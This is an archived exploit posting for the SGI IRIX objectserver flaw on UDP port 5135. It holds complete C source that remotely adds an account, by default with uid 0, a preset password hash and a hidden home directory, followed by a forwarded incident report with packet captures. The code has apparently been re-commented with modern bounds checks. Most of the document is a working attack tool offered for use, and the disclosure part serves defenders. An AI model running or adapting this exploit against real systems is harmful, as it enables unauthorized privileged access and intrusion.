
irix-objectserver.c

irix-objectserver.c
Posted Apr 4, 2000
Authored by Marcy

SGI IRIX objectserver remote exploit - Remotely adds account to the IRIX system. Patched February, 1998. Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2.

tags | exploit, remote
systems | irix
SHA-256 | 50cc9680c224be9e0219d599f01be7fd1deae2ff3856942ef92ade8bb1049054

irix-objectserver.c

At 08:52 AM 3/29/2000 -0500, Howard wrote:
>Since the patches are now officially released, I feel I can finally
>release the details of the SGI objectserver vulnerability. This
>vulnerability was initially reported to CERT and SGI Security on
>October 6, 1997. A beta version of patch 2849 was provided in
>February 1998.
>

Hi. As a legitimate function of my work I routinely archive and catalog
vulnerability information and exploit code. In the interest of
full-disclosure and in possibly helping system administrators evaluate
the security of their SGI boxen, I am attaching the remote exploit for
Irix objectserver (udp 5135).

There are big problems with the US government right now - if you are
doing security work (let alone cracking!) be advised that things are
getting seriously fucked. See the "L0phtcrack as a burglary tool"
article? See all these kids getting PRISON sentences for typing? The
government isn't playing by sane rules. Be prepared. Be awake!

Marcy

/* Copyright (c) July 1997 Last Stage of Delirium */
/* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF */
/* Last Stage of Delirium */
/* */
/* The contents of this file may be disclosed to third */
/* parties, copied and duplicated in any form, in whole */
/* or in part, without the prior written consent of LSD. */

/* SGI objectserver "account" exploit                                  */
/* Remotely adds an account to the IRIX system.                        */
/* Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2,                   */
/* which was supposed to be free from this bug (SGI 19960101-01-PX).   */
/* The vulnerability "was corrected" on 6.2 systems but                */
/* SGI guys fucked up the job and it still can be exploited.           */
/* The same applies to patched 5.x, 6.0.1 and 6.1 systems,             */
/* where the patches SGI released DON'T work.                          */
/* The only difference is that root account creation is blocked.       */
/*                                                                     */
/* usage: ob_account ipaddr [-u username] [-i userid] [-p]             */
/* -i specify userid (other than 0)                                    */
/* -u change the default added username                                */
/* -p probe whether an objectserver is running                         */
/*                                                                     */
/* default account added : lsd                                         */
/* default password : m4c10r4!                                         */
/* default user home directory : /tmp/.new                             */
/* default userid : 0                                                  */


#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/uio.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define E if(errno) perror("");

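/* Scatter/gather descriptors shared by every send and receive in this file:
 * iov[0] always carries the 16-byte message header, iov[1] the body. */
static struct iovec iov[2];
static struct msghdr msg;

/* Receive buffers: the header lands in buf1, the body in buf2.  get_sysinfo()
 * hands back a pointer into buf2, so its result is only valid until the next
 * recvmsg(). */
static char buf1[1024], buf2[1024];

/* UDP socket to the target, opened in main(). */
static int sck;

/* Target IPv4 address as returned by inet_addr().  in_addr_t is exactly the
 * four bytes main() copies into fake_adrs; the original `unsigned long` would
 * have handed memcpy() the zero high half on a 64-bit big-endian ABI. */
static in_addr_t adr;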

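/* Write n bytes as their printable-ASCII rendering, '.' for anything else.
 * Bytes go through unsigned char so isprint() never sees a negative value. */
static void hexdump_ascii(const char *p, size_t n)
{
    size_t i;

    for (i = 0; i < n; i++) {
        unsigned char ch = (unsigned char)p[i];
        putchar(isprint(ch) ? ch : '.');
    }
}

/* Dump n bytes at p: a 4-digit hex length, then rows of up to 16 "xx " cells,
 * each row followed by its ASCII column.  Format matches the original dump
 * except that a final row holding a single byte now gets its ASCII column too
 * (the original's `c>1` test dropped it). */
static void hexdump(const char *p, size_t n)
{
    size_t i, col = 0;

    printf("%04x ", (unsigned)n);
    for (i = 0; i < n; i++) {
        if (col == 16) {
            /* A full row has been written: emit its ASCII column first. */
            printf(" ");
            hexdump_ascii(p + i - 16, 16);
            col = 0;
            printf("\n ");
        }
        printf("%02x ", (unsigned char)p[i]);
        col++;
    }
    printf(" ");
    if (col > 0) {
        for (i = 0; i < 16 - col; i++) printf(" ");
        hexdump_ascii(p + n - col, col);
    }
    printf("\n");
}

/* Dump the message currently described by the global iov/msg pair: the header
 * in iov[0] and, when msg.msg_iovlen is 2, the body in iov[1].
 *
 * The body length is taken from header bytes 0x0a-0x0b (big-endian 16-bit),
 * which on the receive path come from the remote host.  It is therefore
 * clamped to iov[1].iov_len so a hostile length can never read past the
 * buffer. */
void show_msg(void)
{
    const char *hdr = iov[0].iov_base;
    size_t body_len;

    hexdump(hdr, iov[0].iov_len);
    if (msg.msg_iovlen != 2) return;
    if (iov[0].iov_len < 0x0c) return;      /* header too short to carry a length */

    body_len = ((size_t)(unsigned char)hdr[0x0a] << 8) | (unsigned char)hdr[0x0b];
    if (body_len > iov[1].iov_len) body_len = iov[1].iov_len;
    hexdump(iov[1].iov_base, body_len);
    fflush(stdout);
}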

/* Protocol byte tables.  Every message is a 16-byte header followed by a body;
 * header bytes 0x0a-0x0b hold the body length (big-endian), which is how
 * show_msg() sizes the body.  Values such as 0x80 exceed SCHAR_MAX and rely on
 * implementation-defined conversion when stored in a plain char. */

/* Header of the "system info" probe; 0x0024 == sizeof numer_two. */
char numer_one[0x10]={
0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
0x00,0x00,0x00,0x24,0x00,0x00,0x00,0x00
};

/* Body of the probe sent by get_sysinfo(); byte-for-byte the first attacker
 * datagram in the forwarded capture below. */
char numer_two[0x24]={
0x21,0x03,0x00,0x43,0x00,0x0a,0x00,0x0a,
0x01,0x01,0x3b,0x01,0x6e,0x00,0x00,0x80,
0x43,0x01,0x01,0x18,0x0b,0x01,0x01,0x3b,
0x01,0x6e,0x01,0x02,0x01,0x03,0x00,0x01,
0x01,0x07,0x01,0x01
};

/* Header of the account-creation request.  Bytes 10-11 (0x012a here) are
 * overwritten by main() with the real assembled body length. */
char dodaj_one[0x10]={
0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
0x00,0x00,0x01,0x2a,0x00,0x00,0x00,0x00
};

/* Assembly buffer for the account-creation body.  Only the first 13 bytes are
 * fixed; main() appends, in order: the length-prefixed system ID (at 0x0d),
 * dodaj_three, the length-prefixed username, dodaj_four, the uid field and
 * dodaj_five.  The rest of the 1024 bytes is scratch space. */
char dodaj_two[1024]={
0x1c,0x03,0x00,0x43,0x02,0x01,0x1d,0x0a,
0x01,0x01,0x3b,0x01,0x78
};

/* Fixed bytes placed directly after the system ID; the byte that follows
 * them in the finished message is the username length. */
char dodaj_three[27]={
0x01,0x02,0x0a,0x01,0x01,0x3b,
0x01,0x78,0x00,0x00,0x80,0x43,0x01,0x10,
0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
0x01,0x01,0x09,0x43,0x01
};

/* Attribute block that follows the username.  Embedded strings, in order:
 *   "LsD"           - shows up as the GECOS column of the passwd line in the
 *                     forwarded report
 *   "akFJdxenKnyS." - 13 printable bytes; presumably the crypt(3) hash of the
 *                     default password named in the file header (not verified)
 *   "/tmp/.new"     - home directory
 *   "root"          - the 4-byte field 15 bytes before the end; main() rewrites
 *                     it to "user" when -i is given
 * followed by an 11-byte trailer. */
char dodaj_four[200]={
0x17,0x0b,0x01,0x01,0x3b,0x01,0x02,
0x01,0x01,0x01,0x09,0x43,0x01,0x03,0x4c,
0x73,0x44,0x17,0x0b,0x01,0x01,0x3b,0x01,
0x6e,0x01,0x06,0x01,0x09,0x43,0x00,0x17,
0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,0x07,
0x01,0x09,0x43,0x00,0x17,0x0b,0x01,0x01,
0x3b,0x01,0x02,0x01,0x03,0x01,0x09,0x43,
0x00,0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,
0x01,0x09,0x01,0x09,0x43,0x00,0x17,0x0b,
0x01,0x01,0x3b,0x01,0x6e,0x01,0x0d,0x01,
0x09,0x43,0x00,0x17,0x0b,0x01,0x01,0x3b,
0x01,0x6e,0x01,0x10,0x01,0x09,0x43,0x00,
0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
0x0a,0x01,0x09,0x43,0x00,0x17,0x0b,0x01,
0x01,0x3b,0x01,0x6e,0x01,0x0e,0x01,0x03,
0x01,0x09,0x17,0x0b,0x01,0x01,0x3b,0x01,
0x6e,0x01,0x04,0x01,0x09,0x43,0x01,0x0d,
0x61,0x6b,0x46,0x4a,0x64,0x78,0x65,0x6e,
0x4b,0x6e,0x79,0x53,0x2e,0x17,0x0b,0x01,
0x01,0x3b,0x01,0x6e,0x01,0x11,0x01,0x09,
0x43,0x01,0x09,0x2f,0x74,0x6d,0x70,0x2f,
0x2e,0x6e,0x65,0x77,0x17,0x0b,0x01,0x01,
0x3b,0x01,0x6e,0x01,0x12,0x01,0x09,0x43,
0x01,0x04,0x72,0x6f,0x6f,0x74,0x17,0x0b,
0x01,0x01,0x3b,0x01,0x6e,0x01,0x02,0x01,
0x03
};

/* Tail of the body: the login shell "/bin/csh" and the string "LSD". */
char dodaj_five[39]={
0x17,0x0b,0x01,0x01,0x3b,0x01,
0x6e,0x01,0x13,0x01,0x09,0x43,0x01,0x08,
0x2f,0x62,0x69,0x6e,0x2f,0x63,0x73,0x68,
0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
0x0f,0x01,0x09,0x43,0x01,0x03,'L','S','D'
};

/* Raw 16-byte sockaddr_in image used as msg_name: 0x0002 = AF_INET in a
 * 16-bit family field, 0x140f = port 5135, then a 4-byte address placeholder
 * that main() overwrites with the target, then 8 zero bytes (sin_zero).
 * NOTE(review): assumes the host's sockaddr_in has no leading sin_len byte,
 * as on IRIX/Linux; BSD-layout hosts would need a different image. */
char fake_adrs[0x10]={
0x00,0x02,0x14,0x0f,0xff,0xff,0xff,0xff,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

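/* Send the "system info" probe (numer_one header + numer_two body) to the
 * address in fake_adrs and look for the remote system ID in the reply.
 *
 * Returns a pointer into buf2 at the length-prefixed ID (first byte = length,
 * then that many ID bytes), or NULL when the send/receive fails, the reply
 * carries no ID tag, or the announced ID would run past the bytes actually
 * received.  The pointer is valid only until the next recvmsg() into buf2. */
char *get_sysinfo(void)
{
    /* Six-byte tag that precedes the system ID in the reply. */
    static const char id_tag[] = "\x0a\x01\x01\x3b\x01\x78";
    struct sockaddr_in from;
    ssize_t sent, len;
    int i, avail;
    unsigned int id_len, j;

    /* Request: 16-byte header in iov[0], 0x24-byte body in iov[1].  memset()
     * zeroes the ancillary-data fields whatever the msghdr layout (4.3BSD
     * msg_accrights or POSIX msg_control), so this compiles on both. */
    iov[0].iov_base = numer_one;
    iov[0].iov_len = 0x10;
    iov[1].iov_base = numer_two;
    iov[1].iov_len = 0x24;
    memset(&msg, 0, sizeof msg);
    msg.msg_name = fake_adrs;
    msg.msg_namelen = 0x10;
    msg.msg_iov = iov;
    msg.msg_iovlen = 2;

    sent = sendmsg(sck, &msg, 0);
    if (sent < 0) {
        perror("sendmsg");
        return NULL;
    }
    printf("SM: --[0x%04x bytes]--\n", (unsigned)sent);
    show_msg();
    printf("\n");

    /* Reply: header into buf1, up to 0x200 bytes of body into buf2.  A scratch
     * sockaddr takes the responder's address so fake_adrs (the target) is not
     * overwritten by whoever answers; the capture below shows the real server
     * answering from port 5135 in any case. */
    iov[0].iov_base = buf1;
    iov[0].iov_len = 0x10;
    iov[1].iov_base = buf2;
    iov[1].iov_len = 0x200;
    msg.msg_name = (char *)&from;
    msg.msg_namelen = sizeof from;
    msg.msg_iovlen = 2;

    len = recvmsg(sck, &msg, 0);
    if (len < 0) {
        perror("recvmsg");
        return NULL;
    }
    printf("RM: --[0x%04x bytes]--\n", (unsigned)len);
    show_msg();
    printf("\n");

    /* Only the bytes that landed in buf2 (everything after the 16-byte header)
     * may be scanned; a tag needs 6 bytes plus the length byte after it. */
    avail = (int)len - 0x10;
    for (i = 0; i + 7 <= avail; i++) {
        if (memcmp(id_tag, &buf2[i], 6) != 0) continue;

        id_len = (unsigned char)buf2[i + 6];
        if (i + 7 + (int)id_len > avail) {
            fprintf(stderr, "error: system ID (%u bytes) runs past the reply.\n", id_len);
            return NULL;
        }
        printf("remote system ID: ");
        for (j = 0; j < id_len; j++) printf("%02x ", (unsigned char)buf2[i + 7 + j]);
        printf("\n");
        return &buf2[i + 6];
    }
    return NULL;
}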

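/* Send the assembled account-creation request (dodaj_one header + the first
 * len bytes of dodaj_two) to the target and dump the reply.
 *
 * len: number of valid bytes in dodaj_two; main() has already patched the
 *      same value into dodaj_one[10..11].  Values outside 1..sizeof dodaj_two
 *      are rejected instead of letting sendmsg() read past the buffer.
 *
 * The reply is printed but not decoded, so success has to be judged from the
 * dump (or from the target's passwd file), not from this function. */
void new_account(int len)
{
    struct sockaddr_in from;
    ssize_t n;

    if (len <= 0 || (size_t)len > sizeof dodaj_two) {
        fprintf(stderr, "new_account: bad request length %d\n", len);
        return;
    }

    /* Request: header in iov[0], body in iov[1].  memset() zeroes the
     * ancillary-data fields whatever the msghdr layout. */
    iov[0].iov_base = dodaj_one;
    iov[0].iov_len = 0x10;
    iov[1].iov_base = dodaj_two;
    iov[1].iov_len = len;
    memset(&msg, 0, sizeof msg);
    msg.msg_name = fake_adrs;
    msg.msg_namelen = 0x10;
    msg.msg_iov = iov;
    msg.msg_iovlen = 2;

    n = sendmsg(sck, &msg, 0);
    if (n < 0) {
        perror("sendmsg");
        return;
    }
    printf("SM: --[0x%04x bytes]--\n", (unsigned)n);
    show_msg();
    printf("\n");

    /* Reply: header into buf1, body into buf2.  A scratch sockaddr receives
     * the responder's address so fake_adrs (the target) is never clobbered. */
    iov[0].iov_base = buf1;
    iov[0].iov_len = 0x10;
    iov[1].iov_base = buf2;
    iov[1].iov_len = 0x200;
    msg.msg_name = (char *)&from;
    msg.msg_namelen = sizeof from;
    msg.msg_iovlen = 2;

    n = recvmsg(sck, &msg, 0);
    if (n < 0) {
        perror("recvmsg");
        return;
    }
    printf("RM: --[0x%04x bytes]--\n", (unsigned)n);
    show_msg();
    printf("\n");
}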

/* Print the banner and the usage line; text is the program name (argv[0])
 * echoed into the usage line. */
void info(char *text){
    static const char banner[] = "SGI objectserver \"account\" exploit by LSD";

    puts(banner);
    printf("usage: %s ipaddr [-u username] [-i userid] [-p]\n", text);
}

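/* Entry point.
 *
 * usage: ob_account ipaddr [-u username] [-i userid] [-p]
 *   -u  name of the account to add (default "lsd"; at most 19 characters,
 *       the buffer below is 20 bytes)
 *   -i  numeric uid, 0..65535 (the request carries it as two bytes); also
 *       rewrites the "root" field of dodaj_four to "user"
 *   -p  probe only: fetch and print the remote system ID, send no request
 *
 * Exit status: 0 after a successful probe or request, 1 on a bad argument or
 * when the target yields no system ID. */
int main(int argc, char **argv)
{
    int c, user = 0, have_uid = 0, probe = 0;
    unsigned int offset = 40, gr_offset, userid = 0, id_len;
    char *sys_info;
    char username[20];
    in_addr_t target;
    struct timeval tv;
    extern char *optarg;
    extern int optind;

    if (argc < 2) {
        info(argv[0]);
        exit(0);
    }
    optind = 2;                        /* argv[1] is the target; options follow */
    while ((c = getopt(argc, argv, "u:i:p")) != -1) {
        switch (c) {
        case 'u':
            /* Bounded copy: the original strcpy() overflowed username[20]. */
            if (strlen(optarg) >= sizeof username) {
                fprintf(stderr, "error: username longer than %u characters.\n",
                        (unsigned)(sizeof username - 1));
                exit(1);
            }
            strcpy(username, optarg);
            user = 1;
            break;
        case 'i': {
            char *end;
            unsigned long v;

            errno = 0;
            v = strtoul(optarg, &end, 10);
            /* Only two bytes of uid go on the wire; reject what would be
             * silently truncated (and non-numeric input, which atoi() hid). */
            if (end == optarg || *end != '\0' || errno != 0 || v > 0xffff) {
                fprintf(stderr, "error: userid must be a number in 0..65535.\n");
                exit(1);
            }
            userid = (unsigned int)v;
            have_uid = 1;
            break;
        }
        case 'p':
            probe = 1;
            break;
        case '?':
        default:
            info(argv[0]);
            exit(1);
        }
    }

    sck = socket(AF_INET, SOCK_DGRAM, 0);
    if (sck < 0) {
        perror("socket");
        exit(1);
    }
    /* Best-effort receive timeout so a silent or filtered host does not leave
     * recvmsg() blocked forever; failure to set it is ignored on purpose. */
    tv.tv_sec = 5;
    tv.tv_usec = 0;
    (void)setsockopt(sck, SOL_SOCKET, SO_RCVTIMEO, (char *)&tv, sizeof tv);

    target = inet_addr(argv[1]);
    if (target == INADDR_NONE) {
        fprintf(stderr, "error: bad IP address %s.\n", argv[1]);
        exit(1);
    }
    adr = target;
    /* fake_adrs already holds AF_INET and port 5135; bytes 4..7 are the
     * address.  Copy from the 4-byte in_addr_t, not from adr, so the copy is
     * right whatever adr's width and the host's byte order. */
    memcpy(&fake_adrs[4], &target, sizeof target);

    sys_info = get_sysinfo();
    if (sys_info == NULL) {
        printf("error: can't get system ID for %s.\n", argv[1]);
        exit(1);
    }
    if (probe) return 0;

    /* Body layout in dodaj_two:
     *   [13-byte prefix][system ID, length-prefixed][dodaj_three (27)]
     *   [username, length-prefixed][dodaj_four (200)][uid field][dodaj_five (39)]
     * Worst case is 13 + 256 + 27 + 1 + 19 + 200 + 3 + 39 = 558 bytes, so it
     * always fits in the 1024-byte buffer. */
    id_len = (unsigned char)sys_info[0] + 1;          /* length byte + ID bytes */
    memcpy(&dodaj_two[0x0d], sys_info, id_len);
    memcpy(&dodaj_two[0x0d + id_len], dodaj_three, 27);
    offset += id_len;                                 /* 40 == 13 + 27 */

    if (!user) strcpy(username, "lsd");
    dodaj_two[offset++] = (char)strlen(username);
    memcpy(&dodaj_two[offset], username, strlen(username));
    offset += (unsigned int)strlen(username);

    memcpy(&dodaj_two[offset], dodaj_four, 200);
    offset += 200;

    /* dodaj_four ends with the 4-byte "root" field and an 11-byte trailer.
     * With -i the field becomes "user" and a 2-byte big-endian uid follows
     * (the capture below shows 0x02 0x13 0x8a for uid 5002); without it a
     * single 0x00 is appended, which the file header says yields uid 0. */
    gr_offset = offset - 15;
    if (have_uid) {
        memcpy(&dodaj_two[gr_offset], "user", 4);
        dodaj_two[offset++] = 0x02;
        dodaj_two[offset++] = (char)(userid >> 8);
        dodaj_two[offset++] = (char)(userid & 0xff);
    } else {
        dodaj_two[offset++] = 0x00;
    }

    memcpy(&dodaj_two[offset], dodaj_five, 39);
    offset += 39;

    /* Patch the real body length into the header (big-endian 16-bit). */
    dodaj_one[10] = (char)(offset >> 8);
    dodaj_one[11] = (char)(offset & 0xff);
    new_account((int)offset);
    return 0;
}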
/* end g23 exploit post */


__________________________________________________
Do You Yahoo!?
Talk to your friends online with Yahoo! Messenger.
http://im.yahoo.com




Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: "Howard M. Kash III" <hmkash@ARL.MIL>
Subject: Objectserver vulnerability
X-To: BUGTRAQ@securityfocus.com


Since the patches are now officially released, I feel I can finally
release the details of the SGI objectserver vulnerability. This
vulnerability was initially reported to CERT and SGI Security on
October 6, 1997. A beta version of patch 2849 was provided in
February 1998.


Howard


----- Forwarded message # 1:

Date: Mon, 6 Oct 97 7:09:51 EDT
From: "Howard M. Kash III"
To: cert@cert.org, security-alert@sgi.com
Subject: URGENT - new SGI vulnerability


[Internal error while calling pgp, raw data follows]
-----BEGIN PGP SIGNED MESSAGE-----


URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT

SGI objectserver vulnerability allows remote users to create accounts.

Yesterday two of our hosts were compromised by an (as far as I could
determine) unknown, unpatched bug in SGI's objectserver. The attack
consisted of sending UDP packets to port 5135 (see below). The
result was a non-root account being added to the system. The two
compromised hosts were running IRIX 6.2, but the vulnerability may
affect other versions of IRIX. The vulnerability does not appear to
give root access directly, as the attackers used other IRIX
vulnerabilities to gain root access after logging into the new
account.

Attached are the UDP packets exchanged between the attacking host
(aaa.aaa.aaa.aaa) and the target host (ttt.ttt.ttt.ttt). IP
addresses have been masked to protect the guilty - I mean innocent
until proven guilty. The result of this sequence of packets is the
following line added to /etc/passwd:

gueust:x:5002:20:LsD:/tmp/.new:/bin/csh

An entry must also be added to /etc/shadow since the attacker then
logs into the new account with a password.

As a temporary measure we have blocked all traffic to port 5135 at
our gateway.


Howard Kash
U.S. Army Research Lab

- ------------------------------------------------------------------------

IP and UDP headers have been separated out (all traffic below is UDP). I've
decoded some of the packet contents into its ASCII equivalent below the line.

16:52:00.631310 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 52
4500 0050 7d95 0000 2a11 bfb5 aaaa aaaa
tttt tttt
112a 140f 003c 6516
0001 0000
0001 0000 0000 0024 0000 0000 2103 0043
000a 000a 0101 3b01 6e00 0080 4301 0118
0b01 013b 016e 0102 0103 0001 0107 0101
16:52:00.638455 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 95
4500 007b 0644 0000 3a11 26dc tttt tttt
aaaa aaaa
140f 112a 0067 0d37
0001 0186
0001 0000 0000 004f 0000 0000 2903 0043
000a 0080 4300 8043 0105 0a01 013b 0178
0469 0a79 9a01 330a 0101 3b01 7804 690a
799a 0138 0a01 013b 0178 0469 0a79 9a01
020a 0101 3b01 7804 690a 799a 0103 0a01
013b 0178 0469 0a79 9a01 04
16:52:00.794985 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 312
4500 0154 7da3 0000 2a11 bea3 aaaa aaaa
tttt tttt
112a 140f 0140 a1b2
0001 0000
0001 0000 0000 0128 0000 0000 1c03 0043
0201 1d0a 0101 3b01 7804 690a 799a 0102
0a01 013b 0178 0000 8043 0110 170b 0101
3b01 6e01 0101 0943 0106 6775 6575 7374
g u e u s t
170b 0101 3b01 0201 0101 0943 0103 4c73
L s
4417 0b01 013b 016e 0106 0109 4300 170b
D
0101 3b01 6e01 0701 0943 0017 0b01 013b
0102 0103 0109 4300 170b 0101 3b01 6e01
0901 0943 0017 0b01 013b 016e 010d 0109
4300 170b 0101 3b01 6e01 1001 0943 0017
0b01 013b 016e 010a 0109 4300 170b 0101
3b01 6e01 0e01 0301 0917 0b01 013b 016e
0104 0109 4301 0d61 6b46 4a64 7865 6e4b
6e79 532e 170b 0101 3b01 6e01 1101 0943
0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
/ t m p / . n e w
016e 0112 0109 4301 0470 6f6f 7417 0b01
013b 016e 0102 0103 0017 0b01 013b 016e
0113 0109 4301 082f 6269 6e2f 6373 6817
/ b i n / c s h
0b01 013b 016e 010f 0109 4301 074c 7344
2f43 5444
16:52:00.921356 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 41
4500 0045 0646 0000 3a11 2710 tttt tttt
aaaa aaaa
140f 112a 0031 0ef5
0001 0187
0001 0000 0000 0019 0000 0000 2503 0043
0201 1d0a 0080 4300 0a01 013b 0178 0469
0a79 9a01 39
16:53:33.226155 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 52
4500 0050 8f33 0000 2a11 ae17 aaaa aaaa
tttt tttt
112f 140f 003c 6511
0001 0000
0001 0000 0000 0024 0000 0000 2103 0043
000a 000a 0101 3b01 6e00 0080 4301 0118
0b01 013b 016e 0102 0103 0001 0107 0101
16:53:33.232248 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 108
4500 0088 0669 0000 3a11 26aa tttt tttt
aaaa aaaa
140f 112f 0074 3f4f
0001 0188
0001 0000 0000 005c 0000 0000 2903 0043
000a 0080 4300 8043 0106 0a01 013b 0178
0469 0a79 9a01 330a 0101 3b01 7804 690a
799a 0138 0a01 013b 0178 0469 0a79 9a01
390a 0101 3b01 7804 690a 799a 0102 0a01
013b 0178 0469 0a79 9a01 030a 0101 3b01
7804 690a 799a 0104
16:53:33.420972 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 314
4500 0156 8f3e 0000 2a11 ad06 aaaa aaaa
tttt tttt
112f 140f 0142 1399
0001 0000
0001 0000 0000 012a 0000 0000 1c03 0043
0201 1d0a 0101 3b01 7804 690a 799a 0102
0a01 013b 0178 0000 8043 0110 170b 0101
3b01 6e01 0101 0943 0106 6775 6575 7374
170b 0101 3b01 0201 0101 0943 0103 4c73
4417 0b01 013b 016e 0106 0109 4300 170b
0101 3b01 6e01 0701 0943 0017 0b01 013b
0102 0103 0109 4300 170b 0101 3b01 6e01
0901 0943 0017 0b01 013b 016e 010d 0109
4300 170b 0101 3b01 6e01 1001 0943 0017
0b01 013b 016e 010a 0109 4300 170b 0101
3b01 6e01 0e01 0301 0917 0b01 013b 016e
0104 0109 4301 0d61 6b46 4a64 7865 6e4b
6e79 532e 170b 0101 3b01 6e01 1101 0943
0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
016e 0112 0109 4301 0475 7365 7217 0b01
013b 016e 0102 0103 0213 8a17 0b01 013b
016e 0113 0109 4301 082f 6269 6e2f 6373
6817 0b01 013b 016e 010f 0109 4301 074c
7344 2f43 5444
16:53:33.580619 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 41
4500 0045 0671 0000 3a11 26e5 tttt tttt
aaaa aaaa
140f 112f 0031 0dee
0001 0189
0001 0000 0000 0019 0000 0000 2503 0043
0201 1d0a 0080 4300 0a01 013b 0178 0469
0a79 9a01 3a

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNDjGrKDxPoYWV34tAQGVJwQA0OHHlupV1LDF6bFcnWuNfnancEmSs8ee
nF1LRhJrxnniPYI05xZ6aR5OIgtwVFtlAxDdWsgKxuuu3k/CTnSMA3ObsTG1GW1w
I7AXwNmKMUGCglVv6evDHXWbwR6uao//8c/Hfi1s09d/jZIiy2zFm4Gnrkw0sGj+
n9jE26XP5HU=
=yKsl
-----END PGP SIGNATURE-----


----- End of forwarded messages


[End of raw data]
